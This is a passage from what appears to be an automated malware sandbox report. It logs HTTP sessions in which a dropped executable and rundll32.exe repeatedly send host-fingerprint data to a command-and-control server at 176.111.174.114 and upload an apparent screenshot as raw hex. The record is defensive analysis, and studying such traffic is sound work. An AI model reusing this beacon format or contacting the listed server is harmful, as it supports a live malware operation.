85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:13.566013098 CEST11170OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:13.566148043 CEST11172OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:13.566270113 CEST11175OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:13.566607952 CEST11178OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:13.566819906 CEST11181OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:13.567111969 CEST11183OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:13.567414999 CEST11186OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:13.567715883 CEST11189OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 23:00:13.567867041 CEST11191OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:13.568155050 CEST11194OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          392176.111.174.11480192.168.2.449983C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:13.557121992 CEST11167INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:13 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          393192.168.2.449985176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:13.771451950 CEST11355OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          394176.111.174.11480192.168.2.449985C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:13.874295950 CEST11382INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:13 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          395176.111.174.11480192.168.2.449984C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:13.944132090 CEST11383INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:13 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          396192.168.2.449986176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:14.087088108 CEST11384OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          397176.111.174.11480192.168.2.449986C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:14.186113119 CEST11384INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:14 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          398192.168.2.449988176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:14.397738934 CEST11385OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          399176.111.174.11480192.168.2.449988C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:14.500417948 CEST11385INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:14 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          4192.168.2.449750176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:10.222388029 CEST4389OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          40192.168.2.449768176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:16.981093884 CEST4541OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          400192.168.2.449989176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:14.712035894 CEST11386OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          401176.111.174.11480192.168.2.449989C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:14.812351942 CEST11386INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:14 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          402192.168.2.449990176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:15.050785065 CEST11387OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          403176.111.174.11480192.168.2.449990C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:15.152688026 CEST11387INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:15 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          404192.168.2.449992176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:15.367641926 CEST11388OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
